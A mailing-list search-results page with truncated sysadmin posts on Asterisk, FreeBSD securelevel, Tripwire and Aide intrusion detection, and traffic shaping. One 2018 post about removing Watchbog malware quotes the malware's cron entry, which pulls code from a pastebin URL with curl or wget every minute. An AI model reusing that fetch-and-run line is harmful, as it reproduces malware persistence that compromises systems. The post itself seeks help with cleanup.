Displaying 20 results from an estimated 3000 matches similar to: "Aggregating logs from numerous FreeBSD machines"
2004 Jul 09
1
No data when recording a Meetme conference with Monitor
I'm trying to record a Meetme conference to disk, but the Monitor application
doesn't seem to play nicely with Meetme. In extensions.conf, I have this:
exten => 1000,1,Answer
exten => 1000,2,Monitor
exten => 1000,3,Meetme
This starts up the monitoring OK, and it records the prompts that Meetme
gives, but as soon as the user enters the conference, the -out WAV file stops
2004 Feb 11
5
Question about securelevel
I've read about securelevel in the mailing list archive, and found some
pitfalls (and seems to me to be discarded soon).
But according to me, the following configuration should offer a good
security:
- mount root fs read only at boot;
- set securelevel to 3;
- do not permit to unmount/remount roots fs read-write (now it is possible
by means of "mount -uw /");
- the only way to make
2011 Jul 21
2
tripwire alternative
Hello all,
Years ago, I used to work with tripwire for system monitoring.
Last time I checked with "yum search tripwire", there is no hit.
IIRC, it used to be packed by default on older Redhat distros.
Any suggestion for an alternative of tripwire for my CentOS 5.6?
Cheers,
--
**********************************************************************
Viet Nhat General Joint Stock
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2006 Jun 14
3
Tripwire for CentOS
Hi,
I literally have about 36 machines running CentOS on a private network,
and will probably change the remaining 30 or so away from Whitebox or RH
in the near term.
One thing I just noticed was when I tried to search out Tripwire RPM's,
that none seemed evident.
Can anyone point me in the direction of a Tripwire RPM that works with
CentOS 4.3, or advise me on how to create one from the
2005 Jun 16
3
turning off prelinking?
In short, the reason considering (and still only considering) turning it off is
to make tripwire usable again (security vs. performance, I guess).
Is it possible to completely turn it off system-wide? Any additional steps
needed on the existing system (that already have half of the binaries
prelinked)?
What order of performance degradation to expect? If it is minor, nobody is
going to cry
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently I am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2019 Nov 14
0
how to know when a system is compromised
This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC.
Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so
2007 May 07
2
Host information gathering
I'd like to keep the desired and current states of a machine regarding its
configuration.
Sometimes a chain of administrative commands is needed to get a special thing
(re)configured on a machine, e.g. reconfig of a suncluster. This cannot be
done with puppet in an easy way. In the majority of cases, these commands
change appropriate files, which reflect the current
2012 May 25
4
PCI/DSS compliance on CentOS
I have a client project to implement PCI/DSS compliance.
The PCI/DSS auditor has stipulated that the web server, application
middleware (tomcat), the db server have to be on different systems.
In addition the auditor has also stipulated that there be a NTP
server, a "patch" server,
The Host OS on all of the above nodes will be CentOS 6.2.
Below is a list of things that would be
2004 Dec 08
0
Two Zap Problems with 1.0.2 that appeared at the same time: choppiness and squealing
I've got an * system that is having some real problems with 1.0.2.
The biggest problem is that calls going through my T100P get choppy
for about 10 seconds every 1 or 2 minutes. Asterisk is running on a
debian stable system with current packages. The T100P is plugged into
an Adit Channelbank with 8 POTS lines hooked up to the Channelbank.
I've watched the virtual memory and CPU status on
2005 Sep 30
3
Ceil Rate
Hi all,
I just recently began using HTB to try and manage bandwidth for my network.
This is the script I'm using:
/sbin/iptables -t mangle -A FORWARD -o eth1 -s ! 192.168.244.2 -j MARK --set-mark 53
tc qdisc add dev eth1 root handle 1: htb default 20
tc class add dev eth1 parent 1: classid 1:1 htb rate 100mbit burst 131072k quantum 59000
tc class add dev eth1 parent 1:1 classid 1:10
2005 Jan 19
3
tripwire
Is there a redhat or contrib RPM for tripwire?
I looked and didn't find one, but may not have been looking in the
right place.
Zebee
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys,
What is the best way to identify a possible user using a botnet with php
in the server? And if he is using GET commands for example in other server.
Does Apache log outbound connections?
If it is using a file that is not malicious the clam av would not identify.
Thanks
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised??
Every day I watch our systems with all the typical tools, ps, top, who,
I watch firewall / IPS logs, I have logwatch setup and mailing daily
summaries to me and I dive deeper into logs if something looks suspicious.
What am I missing or not looking at that you security gurus are looking at?
I subscribe to the centos and SANS
2009 Aug 30
2
aggregating irregular time series
Hi,
I have a couple of aggregation operations that I don't know how to
accomplish. Let me give an example. I have the following irregular
time series
time x
10:00:00.021 20
10:00:00.224 20
10:00:01.002 19
10:00:02:948 20
1) For each entry time, I'd like to get sum of x for the next 2
seconds
2011 Jun 30
4
aggregating data
Hi,
I am interested in using the cast function in R to perform some aggregation. I did once manage to get it working, but have now forgotten how I did this. So here is my dilemma. I have several thousands of probes (about 180,000) corresponding to each gene; what I'd like to do is obtain a frequency count of the various occurrences of each probe for each gene.
The data would look
2004 Jan 13
1
max queue time; newbie question (fwd)
Martin Pycko <martinp@digium.com> writes:
> sure, use the 'n' option of the queue and put voicemail app as the next
> priority
Will that work? From my read of the code, the timeout parameter is
only checked while the call is being sent to an agent's phone (inside
the try_calling function). The timeout doesn't seem to be checked
while the user is waiting to get to
2002 Jun 26
22
FW: samba woes
All,
I have been working on a component that is included with samba called SMBSH. The binary allows you to automount your NT shares by accessing your profile. I have been working on this for the last
few days and have been unsuccessful at getting it to work. Now I am not much of a programmer, but I did my best to try and troubleshoot this. However it just does not want to work in Linux. I
2014 Oct 09
2
dumping using tftp
Hello,
I'm not quite sure I understand how do you use HDT for dumping over tftp server.
The wiki on dumping does not offer much details on how to set this up.
From my understanding is you need to run pxelinux somewhere but being that HDT is a bootable cd ISO,
I don't see how I can get HDT up from a TFTP server without the need to install something on that TFTP server.
Is there a more